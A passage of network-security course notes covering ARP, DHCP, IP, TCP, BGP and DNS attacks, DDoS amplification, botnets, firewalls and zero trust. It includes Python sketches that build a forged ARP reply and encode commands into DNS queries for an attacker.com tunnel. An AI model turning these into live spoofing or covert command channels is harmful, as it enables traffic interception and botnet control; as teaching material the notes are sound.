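The forged message itself is just a 28-byte ARP payload with the attacker's MAC paired to someone else's IP. The sketch below builds that payload following the RFC 826 field layout (the addresses are invented examples, and nothing is actually sent):

```python
import struct

def forged_arp_reply(attacker_mac: bytes, spoofed_ip: bytes,
                     victim_mac: bytes, victim_ip: bytes) -> bytes:
    """Build the 28-byte ARP reply payload (RFC 826 layout) claiming
    that spoofed_ip (e.g., the gateway's address) lives at attacker_mac."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,        # hardware type: Ethernet
        0x0800,   # protocol type: IPv4
        6, 4,     # hardware / protocol address lengths
        2,        # opcode 2 = reply (often sent unsolicited)
        attacker_mac, spoofed_ip, victim_mac, victim_ip,
    )

# Attacker claims the gateway's IP (10.0.0.1) maps to the attacker's MAC.
pkt = forged_arp_reply(bytes.fromhex("aabbccddeeff"), bytes([10, 0, 0, 1]),
                       bytes.fromhex("112233445566"), bytes([10, 0, 0, 55]))
```

Because hosts typically update their ARP cache on any reply, even an unsolicited one, the victim starts sending gateway-bound traffic to the attacker's MAC address.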

Mitigation strategies include:

  • Dynamic ARP Inspection: Validates ARP packets against a trusted DHCP snooping database.
  • Static ARP entries: Hardcode legitimate IP-to-MAC mappings on critical systems, though this is difficult to manage at scale.

DHCP spoofing

Deceive new devices by supplying malicious network settings.

Dynamic Host Configuration Protocol (DHCP) assigns IP addresses and other configuration settings to clients joining a network. In a DHCP spoofing attack, an attacker races to respond faster than the legitimate server, providing rogue settings such as a malicious DNS server or default gateway. This can lead to traffic interception, redirection, or disruption.

To counter this, DHCP snooping is used on managed switches. It classifies ports as trusted or untrusted and allows DHCP responses only from trusted ports. Combined with ARP inspection, this ensures that clients receive configuration only from legitimate sources.

Network (IP) layer

The Internet Protocol (IP) provides packet delivery across interconnected networks. It offers best-effort delivery, meaning it does not guarantee packet reliability, integrity, or delivery order. Packets can be dropped due to router queue overflows or may arrive out of order after taking different routes to their destination.

Source IP address authentication

Anyone can impersonate a sender.

One fundamental weakness in IP is the absence of source IP address authentication. Operating systems expect applications to use their real source IP address, but privileged users can override this using raw sockets. This allows attackers to forge packets that appear to come from another host. Any service that relies on IP address-based authentication, such as access controls or rate limits, can be subverted.

Anonymous denial of service

Use spoofed IP addresses to reflect error responses toward a victim.

Attackers can perform anonymous denial of service (DoS) by sending packets with spoofed source addresses that trigger error messages. For example, if a packet with a low Time-To-Live (TTL) expires en route, routers send ICMP Time Exceeded responses to the (forged) source address. A large-scale attack using many spoofed packets from distributed machines (a botnet) can generate significant traffic aimed at a target, effectively overwhelming it without revealing the attacker’s location.

Routers

Routers are specialized computers that forward packets between networks using routing tables and often dedicated forwarding hardware. Despite their importance, they are frequently neglected in terms of security. Routers may use default credentials, run outdated firmware, or expose administrative interfaces.

Routers are susceptible to many of the same threats as general-purpose computers. DoS attacks, such as floods of ICMP packets, can overwhelm routing functions. Improper input handling may lead to crashes or corruption from malformed packets.

More critically, attackers can manipulate routing paths through route table poisoning, either by compromising the router itself or injecting forged route advertisements if routing protocols lack authentication.

Transport layer (UDP, TCP)

Transport layer protocols enable applications to exchange data across networks using port numbers (16-bit values independent of Ethernet switch ports) to identify application endpoints.

UDP

The User Datagram Protocol (UDP) is connectionless and does not maintain state between packets. It offers no guarantee of delivery, ordering, or authenticity. Like IP, it is susceptible to spoofing, making it a common vector for reflection attacks and simple DoS techniques.

TCP

The Transmission Control Protocol (TCP) provides reliable, ordered, and connection-oriented communication. TCP uses sequence numbers to track data and ensure integrity. Connections are established via a three-way handshake:

  1. The client sends a SYN packet with a random initial sequence number.
  2. The server replies with a SYN-ACK, acknowledging the client’s sequence number and providing its own.
  3. The client responds with an ACK, completing the handshake and beginning data transfer.

To mitigate spoofing and hijacking, TCP uses random initial sequence numbers, making it harder for attackers to guess valid sequence numbers and inject forged packets.
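The steps above can be simulated to make the sequence-number arithmetic concrete. This sketch models only the numbers exchanged, not real sockets:

```python
import random

def three_way_handshake():
    """Simulate the sequence-number exchange of a TCP connection setup."""
    client_isn = random.getrandbits(32)                    # 1. SYN
    server_isn = random.getrandbits(32)
    syn_ack = {"seq": server_isn,                          # 2. SYN-ACK
               "ack": (client_isn + 1) % 2**32}
    ack = {"seq": (client_isn + 1) % 2**32,                # 3. ACK
           "ack": (server_isn + 1) % 2**32}
    return client_isn, server_isn, syn_ack, ack
```

The 32-bit initial sequence numbers are chosen randomly; an off-path attacker who cannot observe the SYN-ACK must guess them to inject data into the connection.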

SYN flooding

In a SYN flooding attack, an attacker sends many SYN packets but never completes the handshake. The server allocates resources for each half-open connection, eventually exhausting its capacity.

To defend against this, servers use SYN cookies: instead of storing state, the server encodes necessary connection information into the initial sequence number. When the client replies with an ACK, the server validates the cookie before allocating resources, protecting against resource exhaustion.
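The cookie trick can be sketched as deriving the initial sequence number from a keyed hash of the connection's identity. This is a simplified illustration (real SYN cookies also encode a timestamp and MSS value; the secret here is an invented placeholder):

```python
import hashlib

SECRET = b"rotated-server-secret"  # placeholder for a per-server secret

def syn_cookie(client_ip: str, client_port: int) -> int:
    """Derive the server's initial sequence number from the connection's
    identity, so no state is stored for half-open connections."""
    digest = hashlib.sha256(
        SECRET + f"{client_ip}:{client_port}".encode()).digest()
    return int.from_bytes(digest[:4], "big")

def accept_ack(client_ip: str, client_port: int, ack_number: int) -> bool:
    """Allocate connection state only if the final ACK proves the client
    received our cookie (the ACK must equal cookie + 1)."""
    return ack_number == (syn_cookie(client_ip, client_port) + 1) % 2**32
```

A SYN flood from spoofed addresses now costs the server nothing: no state exists until a client completes the handshake with a valid cookie, which a spoofing attacker never sees.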

TCP Reset

Attackers can forcibly terminate a TCP session by injecting a forged RST (reset) segment. If the sequence number in the forged packet is close to the expected value, the receiving host may accept it and tear down the connection.

While the theoretical chance of guessing the exact 32-bit sequence number is extremely low (1 in 2^32), many systems tolerate a window of acceptable sequence numbers to accommodate out-of-order packets. Attackers can exploit this by flooding the target with RST packets using sequence numbers that fall within this range. If successful, the connection is prematurely closed, disrupting communication.
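The arithmetic shows why the window matters so much. Assuming a typical 64 KB receive window (an illustrative figure, not a protocol constant), spacing guesses one window apart covers the whole sequence space in tens of thousands of packets rather than billions:

```python
# How many forged RSTs does an attacker need when the receiver accepts
# any sequence number inside its window?
SEQ_SPACE = 2**32
WINDOW = 65_535          # assume a typical maximum receive window

# Probability that one forged RST lands inside the window.
p_one_guess = WINDOW / SEQ_SPACE

# Spacing guesses one window apart covers the whole sequence space.
guesses_to_cover = -(-SEQ_SPACE // WINDOW)   # ceiling division
```

About 65,538 packets, which is trivial to send, compared with roughly 4.3 billion if the receiver demanded the exact sequence number.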

Routing Protocols

The Internet is composed of many independently operated networks known as Autonomous Systems (AS). Each AS manages a group of IP addresses and uses internal routing protocols to move traffic within its domain. To route traffic between autonomous systems, the Internet relies on the Border Gateway Protocol (BGP). BGP enables external routers at each AS to exchange reachability information and determine the best path for forwarding packets across the global network. It is fundamental to Internet routing but was designed with minimal built-in security, relying heavily on trust among the operators of the more than 82,000 active autonomous systems.

BGP Hijacking

BGP hijacking (or route hijacking) occurs when a network falsely claims ownership of IP prefixes it does not control, misleading other networks into routing traffic through the attacker’s system. This allows for traffic interception, man-in-the-middle attacks, packet inspection, or denial of service.

There are two common subtypes of BGP hijacking:

BGP Path Forgery: The attacker manipulates the AS path in BGP advertisements to appear as a legitimate route. Because BGP lacks path validation, other networks may accept these announcements and route traffic through the attacker’s AS.

BGP Prefix Forgery: The attacker advertises a more specific prefix (e.g., a /24 instead of a legitimate /22). BGP prioritizes more specific routes, so this method effectively diverts traffic to the attacker, even if the destination address is legitimately owned by another AS.
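Longest-prefix matching is what makes prefix forgery work, and it can be demonstrated directly with Python's `ipaddress` module. The prefixes and AS names below are invented examples mirroring the /22-versus-/24 scenario in the text:

```python
import ipaddress

def best_route(destination: str, advertisements: dict[str, str]) -> str:
    """Select the advertisement with the longest (most specific) matching
    prefix, as routers do when choosing among BGP routes."""
    addr = ipaddress.ip_address(destination)
    matching = [(ipaddress.ip_network(prefix), origin_as)
                for prefix, origin_as in advertisements.items()
                if addr in ipaddress.ip_network(prefix)]
    return max(matching, key=lambda m: m[0].prefixlen)[1]

advertisements = {
    "203.0.112.0/22": "AS-legitimate",   # the real owner's announcement
    "203.0.113.0/24": "AS-attacker",     # forged, more specific prefix
}
```

Any destination inside the forged /24 is routed to the attacker even though the legitimate /22 still covers it; addresses in the rest of the /22 are unaffected, which also makes the hijack harder to notice.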

Both methods exploit BGP’s design, which assumes honest cooperation among participants and lacks cryptographic verification of routing announcements.

Defending Against BGP Hijacking

To address these vulnerabilities, two major security enhancements have been proposed:

RPKI (Resource Public Key Infrastructure): RPKI allows IP address holders to cryptographically sign Route Origin Authorizations (ROAs) that specify which AS is permitted to announce specific prefixes. Routers can validate BGP announcements against these signed ROAs to reject forged origin claims. However, RPKI adoption remains incomplete, and misconfigured ROAs can unintentionally block valid traffic.

BGPsec: BGPsec extends BGP by enabling cryptographic validation of the entire AS path. Each AS adds a digital signature to the routing update, allowing downstream routers to verify the path’s integrity. While BGPsec significantly improves security, it introduces high computational overhead and requires all participating ASes to adopt the protocol for full effectiveness. Adoption has been slow due to the complexity of implementation and compatibility concerns.

Domain Name System (DNS)

The Domain Name System (DNS) is a hierarchical service that maps human-readable domain names (like example.com) to IP addresses. It is fundamental to the operation of the Internet, as most services rely on name-based addressing.

Each device typically runs a DNS stub resolver, which performs lookups as follows:

  1. It first checks a local file (e.g., hosts) for predefined mappings.
  2. Then it checks its local DNS cache.
  3. If no match is found, it sends a query to an external resolver, typically provided by an ISP or a public DNS service like Google Public DNS or OpenDNS.

DNS is inherently trusted: applications, including web browsers, rely on DNS for enforcing the same-origin policy, which governs what content can be shared between web pages. However, standard DNS uses UDP, with no built-in authentication or integrity. The only validation is a Query ID (QID) field used to match responses to queries. Because DNS queries and responses are unauthenticated, they can be intercepted, modified, or spoofed.

To address these issues, DNSSEC (DNS Security Extensions) was introduced. DNSSEC allows responses to be digitally signed, enabling clients to verify their authenticity. However, deployment remains limited due to complexity, larger response sizes, and compatibility challenges.

Pharming Attack

A pharming attack manipulates DNS resolution to redirect a victim’s traffic to a malicious destination. This can be done in several ways:

  • Modifying the local system’s hosts file to insert malicious name-to-IP mappings.
  • Changing the DNS server configuration (e.g., via malware or rogue DHCP responses), causing the system to use an attacker-controlled DNS server.
  • Compromising legitimate DNS servers and altering the records they return.

By corrupting DNS resolution at the source, attackers can transparently redirect users to malicious sites without altering URLs or requiring user interaction.

DNS Cache Poisoning (DNS Spoofing)

A DNS cache poisoning attack corrupts the resolver’s cache with forged responses, leading to persistent redirection of traffic to malicious addresses.

A common variant leverages JavaScript in a malicious webpage to repeatedly trigger DNS queries for non-existent subdomains (e.g., a.bank.com). These queries prompt a legitimate DNS resolver to issue requests for the unknown subdomain. Simultaneously, the attacker floods the resolver with spoofed responses, each containing a different random Query ID and pointing to a rogue DNS server for the target domain (e.g., bank.com). If a spoofed response has a matching QID, the resolver accepts it and caches the malicious DNS server as authoritative for the domain. All future queries for bank.com and its subdomains will be redirected.

If the attempt fails, the attacker simply repeats it with a new subdomain (b.bank.com, c.bank.com, etc.), increasing the odds of success.

Summary: Attackers forge DNS responses with random query IDs in the hope that one matches an active query. A successful match poisons the cache, redirecting future queries to attacker-controlled IP addresses.
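The odds behind this race come from the 16-bit Query ID. Each forged response has a 1-in-65,536 chance of matching the in-flight query, and the cumulative success probability over many spoofed responses (and many retried subdomains) follows directly:

```python
# The query ID is only 16 bits, so each forged response has a 1-in-65536
# chance of matching the outstanding query.
def poisoning_success_probability(spoofed_responses: int) -> float:
    return 1 - (1 - 1 / 2**16) ** spoofed_responses
```

This is why modern resolvers also randomize the UDP source port, adding roughly 16 more bits of entropy and pushing the per-guess odds from 1 in 65,536 toward 1 in 4 billion.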

DNS Rebinding

DNS rebinding is a browser-based attack that exploits the same-origin policy by manipulating DNS resolution.

Here’s how it works:

  1. The attacker registers a domain (e.g., attacker.com) and sets up a DNS server.
  2. The domain’s DNS record is configured with a short TTL, allowing rapid updates.
  3. The victim visits a malicious webpage at attacker.com, which loads JavaScript.
  4. Because the script is from the same origin (attacker.com), it can make requests back to the domain.
  5. The attacker’s DNS server quickly changes the IP address for attacker.com to an internal IP (e.g., 192.168.1.1).
  6. The JavaScript, still considered to be from the same origin, now gains access to internal systems.

Summary: By quickly changing a domain’s resolved IP address after a script is loaded, attackers can bypass same-origin restrictions and access internal network resources.
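
One common defense is for the resolver or browser to refuse DNS answers that map an external domain to an internal address. A minimal sketch using Python's standard ipaddress module (addresses are illustrative):

```python
# Sketch: reject DNS answers that resolve a public domain to a private
# (RFC 1918), loopback, or link-local address, which is the hallmark of
# a rebinding attack.
import ipaddress

def is_suspicious_answer(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return addr.is_private or addr.is_loopback or addr.is_link_local

print(is_suspicious_answer("93.184.216.34"))  # public address: fine
print(is_suspicious_answer("192.168.1.1"))    # internal address: reject
```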

Distributed Denial of Service (DDoS) Attacks

A Distributed Denial of Service (DDoS) attack aims to make a service unavailable by overwhelming it with traffic from many sources. These attacks can target servers, applications, or entire networks, making them inaccessible to legitimate users. Motivations range from extortion and political activism to cover for data breaches or simply disrupting services.

DDoS attacks often leverage botnets. These are networks of compromised devices called zombies, which are remotely controlled by a command and control (C&C) server. Each zombie can generate traffic, and the distributed nature of these attacks makes mitigation difficult.

Techniques Used in DDoS Attacks

Attackers commonly use the following techniques:

  1. Exploiting Asymmetry: Target systems where handling requests (e.g., complex queries or SSL handshakes) is far more resource-intensive than sending them.
  2. Spoofing Source Addresses: Hide the origin of traffic and avoid replies by using fake source IPs.
  3. Reflection: Send spoofed requests to third-party servers, which reply to the victim.
  4. Amplification: Use services that respond with far more data than they receive, multiplying the effect.
  5. Botnets: Coordinate thousands or millions of devices to generate massive traffic.

Forms of Overwhelming a Target

  • Volumetric Attacks: Exhaust bandwidth by flooding with high data volumes (e.g., measured in Tbps).
  • Packet-per-Second (PPS) / Request-per-Second (RPS) Attacks: Overload processing capacity by sending small packets or HTTP requests at a high rate.
  • Application-Layer Loops: Abuse certain UDP protocols (e.g., TFTP, DNS) to cause endless response loops between misconfigured servers.

Reflection and Amplification Attacks

Reflection amplification attacks are a powerful and efficient DDoS technique that allows an attacker to direct large volumes of traffic at a target using minimal resources. The core idea is to exploit intermediary servers—typically public, UDP-based services—to act as unwitting amplifiers.

Because UDP is connectionless and doesn’t validate sender addresses, attackers can spoof the victim’s IP as the source. The service replies to the victim with a response that is often far larger than the original request, amplifying the traffic volume.

Amplification is an appealing technique for several reasons:

  • Efficiency: A small spoofed request can generate a massive response, sometimes over 50,000 times larger, allowing an attacker to create a huge data flood with little effort.

  • Anonymity: The attacker spoofs the source IP address to make it appear as though the target initiated the request. This obscures the attack’s true origin, making it extremely difficult to trace.

  • Evasion: Since responses come from legitimate servers, filtering traffic based on source IPs becomes challenging.

  • Global scale: The use of distributed public servers spreads out the load, bypassing bandwidth limitations on the attacker’s side.

Amplification factors vary by service:

Protocol         Amplification Factor   Notes
Memcached        Up to 51,200×          Highly abused; can store large payloads
NTP (Monlist)    556×                   Returns 600 recent IP addresses
DNS (ANY query)  50–179×                Returns all resource records
CLDAP            56–70×                 Common in misconfigured Windows DCs
DTLS             37×                    Datagram TLS—UDP-based SSL variant

For example, a 60-byte DNS query for “ANY” records can produce a 3,500-byte response (58× amplification).
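
The arithmetic from the DNS example generalizes: the attacker's outbound bandwidth times the amplification factor gives the flood arriving at the victim. A quick sketch (the 1 Mbps figure is illustrative):

```python
# Sketch: amplification factor and the resulting traffic at the victim.
# Values mirror the 60-byte request / 3,500-byte response example above.

def amplification_factor(request_bytes: int, response_bytes: int) -> float:
    return response_bytes / request_bytes

factor = amplification_factor(60, 3500)    # roughly 58x, as in the text
attacker_bps = 1_000_000                   # 1 Mbps of spoofed requests
victim_bps = attacker_bps * factor         # traffic arriving at the victim
print(f"{factor:.0f}x -> victim sees {victim_bps / 1e6:.0f} Mbps")
```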

Botnets and Command & Control

A botnet is a distributed network of infected devices under the control of a command & control (C&C) server. Each device, or zombie, waits for instructions from the C&C server to begin an attack. Botnets are often built using malware like Mirai, which targets IoT devices with default credentials.

Botnets are difficult to detect and block because:

  • Traffic originates from many IP addresses and regions.
  • The attack doesn’t come from a single identifiable source.
  • Many devices may be legitimate hosts unwittingly participating.

In addition to overwhelming targets with traffic, botnets must maintain control and coordination. This is typically achieved through a command and control (C&C) infrastructure, which sends instructions to infected devices (zombies) and receives updates in return.

To evade detection and bypass firewalls or intrusion detection systems, botnets often employ covert communication techniques, such as:

DNS Tunneling: Botnets encode commands or data into DNS queries or responses. Since DNS traffic is widely allowed through firewalls and rarely inspected closely, it offers a discreet channel for communication. For example, a bot might send a query like cmd123.attacker.com, where the subdomain encodes a command, and the DNS server under attacker control interprets and responds with encoded data.
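
A hypothetical sketch of the encoding side of DNS tunneling: a command is base32-encoded (DNS labels are case-insensitive, so base32 is the usual choice) and embedded as a subdomain of the attacker's zone. The domain attacker.com comes from the text; everything else is illustrative:

```python
# Sketch: encoding a short command into a DNS query name, and decoding
# it on the attacker-controlled DNS server.
import base64

def encode_command(cmd: bytes, zone: str = "attacker.com") -> str:
    # Base32, lowercased and stripped of '=' padding, makes a legal DNS label.
    label = base64.b32encode(cmd).decode().rstrip("=").lower()
    return f"{label}.{zone}"

def decode_label(query: str) -> bytes:
    label = query.split(".")[0].upper()
    label += "=" * (-len(label) % 8)       # restore base32 padding
    return base64.b32decode(label)

q = encode_command(b"run update")
print(q)                                   # looks like an ordinary DNS name
assert decode_label(q) == b"run update"
```

Real tunneling tools also chunk data across many queries and carry replies in TXT or CNAME records; this shows only the core trick of hiding bytes in a hostname.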

Encrypted C&C Channels: Botnets may also use HTTPS or custom encrypted protocols over standard ports (e.g., TCP 443) to hide C&C traffic in normal web flows.

By hiding command traffic inside benign-looking or commonly allowed protocols like DNS, botnets can persist in networks for long periods without detection, while continuing to receive commands or exfiltrate data.

Defensive Strategies

Network-Level Defenses

  • Rate Limiting: Limit how many requests a client can make.
  • Traffic Shaping: Prioritize essential traffic; deprioritize or throttle UDP.
  • Traffic Filtering: Block packets with suspicious source or destination ports/IPs.
  • Blackhole Routing: Drop traffic to a victim IP entirely to protect infrastructure.
  • IP Blacklisting: Block known bad IPs or regions.
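
The rate-limiting defense above is commonly implemented as a token bucket: each client earns tokens at a steady rate and spends one per request, with short bursts allowed up to the bucket size. A minimal sketch with illustrative parameters:

```python
# Sketch: token-bucket rate limiter. Each client may send `rate` requests
# per second on average, with bursts of up to `burst` requests.

class TokenBucket:
    def __init__(self, rate: float, burst: float):
        self.rate, self.burst = rate, burst
        self.tokens = burst
        self.last = 0.0

    def allow(self, now: float) -> bool:
        # Refill tokens for the elapsed time, capped at the burst size.
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

bucket = TokenBucket(rate=2, burst=3)      # 2 req/s, bursts of 3
results = [bucket.allow(t) for t in (0.0, 0.1, 0.2, 0.3, 5.0)]
print(results)                             # the burst passes, then a request is refused
```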

Application-Level Defenses

  • Web Application Firewalls: Inspect and filter HTTP/S traffic.
  • CAPTCHAs: Block automated requests by requiring user interaction.
  • Content Delivery Networks (CDNs): Offload traffic to edge servers. Companies that run CDNs, like Akamai or Amazon, have a huge number of load-balanced content servers distributed around the world across many ISPs. Even the largest DDoS attacks are unlikely to overwhelm them.

Participation Mitigation

  • Disable Unused Services: Especially UDP-based services vulnerable to amplification.
  • Monitor Traffic: Watch for unusual volumes from internal systems.
  • Patch Exposed Servers: Keep systems like memcached or CLDAP secure and access-controlled.

Firewalls

Firewalls are a critical component of network security architecture. Their primary role is to protect the boundary between a trusted internal network and an untrusted external one, such as the Internet. A firewall enforces access control policies by inspecting and filtering traffic that flows between these two environments.

Firewalls operate at different layers of the network stack and have evolved over time: from basic packet filtering to sophisticated systems capable of application-aware inspection and behavioral analysis.

Network Address Translation (NAT)

One early innovation associated with firewall deployment is Network Address Translation (NAT). NAT enables multiple devices within a private network to share a single public IP address. It maps internal source addresses and ports to external ones, modifying both IP and transport-layer headers.

This technique was driven by the limited supply of IPv4 addresses. Private IP ranges defined in RFC 1918 (e.g., 192.168.0.0/16, 10.0.0.0/8) are non-routable on the public Internet and require NAT to communicate externally.

NAT inherently provides a security benefit: unsolicited inbound traffic from external hosts cannot reach internal systems unless a session has already been initiated from inside.
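
NAT's bookkeeping can be sketched as a translation table: each internal (address, port) pair is rewritten to the router's single public address with a unique port, and replies are mapped back through the table. Addresses below are illustrative RFC 1918 and documentation-range examples:

```python
# Sketch: the core NAT translation table. Unsolicited inbound packets
# match no entry and are dropped, which is the security benefit noted above.

PUBLIC_IP = "203.0.113.5"

class NatTable:
    def __init__(self):
        self.out, self.back = {}, {}
        self.next_port = 40000

    def translate_out(self, src_ip: str, src_port: int):
        key = (src_ip, src_port)
        if key not in self.out:
            self.out[key] = self.next_port
            self.back[self.next_port] = key
            self.next_port += 1
        return PUBLIC_IP, self.out[key]

    def translate_in(self, dst_port: int):
        # Returns the internal endpoint, or None if no session exists.
        return self.back.get(dst_port)

nat = NatTable()
print(nat.translate_out("192.168.0.10", 5555))  # rewritten to the public IP
print(nat.translate_in(40000))                  # reply routed back inside
print(nat.translate_in(41234))                  # no mapping: dropped (None)
```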

Packet Filtering Firewalls

First-generation firewalls, also known as packet filters or screening routers, inspect network packets independently. These filters operate by matching packet header fields against a set of rules, known as an access control list (ACL), and taking an action—typically to accept, drop, or reject the packet.

This set of rules is often referred to as a chain because the firewall processes the rules sequentially, like links in a chain:

  • Each incoming or outgoing packet is matched against the rules in order.
  • Once a rule matches, its corresponding action is applied and no further rules are evaluated.
  • If no rule matches, a default policy—typically “deny all”—is applied.

The term “chain” is commonly used in firewall implementations like Linux’s iptables and nftables, where different chains can be defined for handling various traffic flows (e.g., input, output, forwarding), and rules can jump to other chains for more modular control.

Rules in a packet filter typically examine:

  • Source and destination IP addresses
  • Source and destination ports
  • Protocol (e.g., TCP, UDP, ICMP)
  • Interface on which the packet was received

The security model often follows “default deny,” meaning only explicitly allowed traffic is permitted. These filters do not maintain any context between packets, making them stateless but efficient.
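
The first-match, default-deny behavior described above can be sketched in a few lines; the rule fields and sample packets are illustrative, not a real iptables configuration:

```python
# Sketch: a stateless packet-filter chain. Rules are evaluated in order;
# the first match wins; if nothing matches, the default policy is deny.

RULES = [
    # (action, protocol, dst_port) -- None matches any port
    ("accept", "tcp", 443),        # allow HTTPS
    ("accept", "tcp", 22),         # allow SSH
    ("drop",   "udp", None),       # drop all UDP
]

def filter_packet(protocol: str, dst_port: int) -> str:
    for action, proto, port in RULES:
        if proto == protocol and (port is None or port == dst_port):
            return action          # first match wins; stop evaluating
    return "drop"                  # default deny

print(filter_packet("tcp", 443))   # accept
print(filter_packet("udp", 53))    # drop
print(filter_packet("tcp", 8080))  # drop (no rule matched)
```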

Stateful Packet Inspection (SPI)

Second-generation firewalls introduced Stateful Packet Inspection (SPI). These firewalls maintain state tables to track the status of network connections, especially useful for TCP, which involves distinct setup and teardown phases.

Stateful firewalls can:

  • Allow return traffic only after a valid connection is initiated
  • Block unsolicited packets that appear malicious (e.g., spoofed TCP packets)
  • Track stateless protocols like UDP and ICMP by observing request-reply relationships

This state tracking makes SPI firewalls more secure and functional than stateless filters.
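
The state table at the heart of SPI can be sketched simply: outbound connections create entries, and an inbound packet is accepted only if it is the reply to a recorded session. Endpoints are illustrative:

```python
# Sketch: an SPI state table. Return traffic is allowed only if it
# matches a connection that was initiated from inside.

class StatefulFirewall:
    def __init__(self):
        self.connections = set()

    def outbound(self, src, dst):
        self.connections.add((src, dst))   # record the initiated session

    def inbound_allowed(self, src, dst) -> bool:
        # A reply is allowed only if (dst, src) matches an outbound session.
        return (dst, src) in self.connections

fw = StatefulFirewall()
fw.outbound(("10.0.0.5", 41000), ("93.184.216.34", 443))
print(fw.inbound_allowed(("93.184.216.34", 443), ("10.0.0.5", 41000)))  # reply: allowed
print(fw.inbound_allowed(("203.0.113.9", 80), ("10.0.0.5", 41000)))     # unsolicited: blocked
```

A real implementation also tracks TCP state transitions and times out idle entries, which is how UDP and ICMP "sessions" are approximated.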

Deep Packet and Content Inspection

Third-generation firewalls implement Deep Packet Inspection (DPI). Unlike earlier models that focus only on IP and transport headers, DPI firewalls examine application-layer content.

This allows:

  • Detection of protocol misuse (e.g., malformed HTTP headers)
  • Filtering based on URLs, file types, or keywords
  • Blocking of risky elements like ActiveX or Java applets

Deep Content Inspection (DCI) extends DPI by reconstructing entire content streams, decoding them (e.g., base64 in email), and scanning for malware signatures or sensitive data leaks.

Deep Packet Inspection (DPI) and Deep Content Inspection (DCI) face challenges when dealing with encrypted traffic, such as HTTPS, SSH, or TLS-protected protocols. There are a few approaches to dealing with this, none of them great:

  • Examine only headers and protocols: Even when data is encrypted, certain metadata like source/destination IP addresses, ports, and TLS handshake parameters remain visible. DPI can still infer the protocol in use and possibly the domain name (via Server Name Indication in TLS), but not the actual content.
  • Man-in-the-Middle (MitM) Interception: The DPI device presents its own TLS certificate to the client. The DPI system acts as an intermediary, terminating the secure connection from the client and creating a new encrypted session to the server. This breaks end-to-end encryption but is often used by next-generation firewalls.
  • Host-based firewalls: Instead of decrypting in the network (at the firewall), the inspection may happen at the endpoint before encryption (for outgoing traffic) or after decryption (for incoming traffic) using host-based firewalls or other security agents.

Application Proxies

Application-layer proxies mediate communication for specific protocols (e.g., HTTP, FTP). They terminate connections from clients, inspect requests, and then relay traffic to the target server if the request passes policy checks.

These proxies can:

  • Enforce strict protocol compliance
  • Prevent direct connections between networks
  • Operate on dual-homed hosts for added segmentation

Security Zones and DMZs

Modern networks are divided into security zones to manage risk and enforce access control policies. Each zone represents a grouping of systems with similar trust levels and security requirements. By segmenting networks into zones and controlling traffic between them using firewalls, organizations can limit the potential damage of security breaches and prevent lateral movement by attackers.

One key architectural concept is the Demilitarized Zone (DMZ). The DMZ is a semi-trusted zone that sits between the external Internet and the internal network. It hosts public-facing services, such as web servers, DNS servers, and mail relays, that need to be accessible to external users but should not have unrestricted access to sensitive internal systems.

A bastion host is a system placed in the DMZ that is hardened and exposed to potential attacks. Because it interfaces with untrusted networks, it is designed to resist compromise:

  • It runs only essential services
  • It uses minimal software
  • It has limited user accounts
  • It is regularly audited for vulnerabilities

A DMZ architecture typically involves two firewalls or a multi-interface firewall. Traffic is tightly controlled at each boundary:

  • External clients can access only specific services hosted in the DMZ.
  • Internal clients can reach both the DMZ and the Internet, subject to policy.
  • DMZ systems have limited access to internal systems and the Internet.

This layered defense strategy helps contain compromises and provides a buffer zone between the most vulnerable systems and the organization’s critical assets.

Intrusion Detection and Prevention Systems (IDS/IPS)

Intrusion Detection Systems (IDS) monitor traffic to detect suspicious behavior and alert administrators. Intrusion Prevention Systems (IPS) actively block malicious traffic in real time.

Types of detection include:

  • Protocol-based IDS: Enforces protocol correctness (e.g., HTTP header validation)
  • Signature-based IDS: Matches known attack patterns (e.g., malware signatures)
  • Anomaly-based IDS: Detects deviations from established baseline behavior

While signature-based detection is precise for known threats, anomaly detection can identify novel attacks at the cost of more false positives.

Host-Based Firewalls

Unlike network firewalls, host-based firewalls run on individual systems and monitor traffic per application. They offer fine-grained control and are valuable in a deperimeterized world, where the distinction between internal and external networks has eroded.

One key advantage of host-based firewalls is their ability to associate network activity with specific applications running on the system. Unlike traditional packet filters that make decisions based solely on IP addresses and port numbers, host-based firewalls can identify and control network traffic on a per-application basis.

This enables the firewall to:

  • Allow or block traffic based on the identity of the software process, not just network attributes
  • Prompt users to approve or deny network access when a new application attempts communication
  • Define granular policies, such as permitting only a web browser to access the Internet, while blocking all traffic from unknown or suspicious programs
  • Prevent unauthorized or malicious software from exfiltrating data, even if it attempts to use commonly allowed ports like 443 (HTTPS)

This per-application awareness makes host-based firewalls particularly effective at detecting and containing malware. If an unapproved program attempts to send data to the Internet, it can be blocked even if it mimics legitimate traffic.

However, this model is not without its limitations. If malware gains elevated privileges, such as root or administrative access, it may be able to disable the firewall or manipulate its configuration, undermining the protections it provides.

Despite this risk, host-based firewalls are a crucial component of a defense-in-depth strategy. They complement network-level protections by offering localized, context-aware control tailored to the specific behavior of individual systems and applications.

Zero Trust and Deperimeterization

With the rise of mobile devices, cloud computing, and remote work, internal networks can no longer be assumed trustworthy. Deperimeterization describes the collapse of traditional network boundaries.

The Zero Trust Architecture (ZTA) model addresses this by requiring authentication and authorization for every connection, regardless of its source. Key principles include:

  • No implicit trust for devices on the internal network
  • Least privilege access enforced dynamically
  • Continuous validation of users, devices, and policies

ZTA may require micro-segmentation, strong identity verification, and support from both network infrastructure and applications.

Summary

Type                      Description
Screening Router          1st-gen firewall using IP, port, and protocol filtering
Stateful Inspection       2nd-gen firewall that tracks connection state
Deep Packet Inspection    3rd-gen firewall with application-layer awareness
Deep Content Inspection   Examines full data streams across packets
Application Proxy         Acts as intermediary, enforces protocol correctness
IDS/IPS                   Detects or prevents attacks, often as part of DPI
Host-Based Firewall       Runs on endpoints, offers per-application controls
Host-Based IPS            Blocks specific malicious actions in real time (e.g., port scans)
Zero Trust Architecture   Policy-driven, identity-aware access control across all assets

Web Security

Web applications have grown from static pages into highly interactive platforms. This transformation has introduced a wide attack surface, shifting attention from server vulnerabilities to complex browser and client-side threats. Today, web security must address how scripts, data, and user state interact across trust boundaries in the browser.

Same-Origin Policy

The same-origin policy (SOP) is the foundation of browser security. It restricts how documents or scripts loaded from one origin can interact with resources from another.

An origin is defined by:

  • Scheme (e.g., http or https)
  • Hostname
  • Port

Resources sharing all three attributes are of the same origin. The same-origin policy prevents a script on one site from reading data (like cookies or DOM) from another origin. While content like images and stylesheets can be embedded from other origins, they cannot be programmatically accessed or modified.
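
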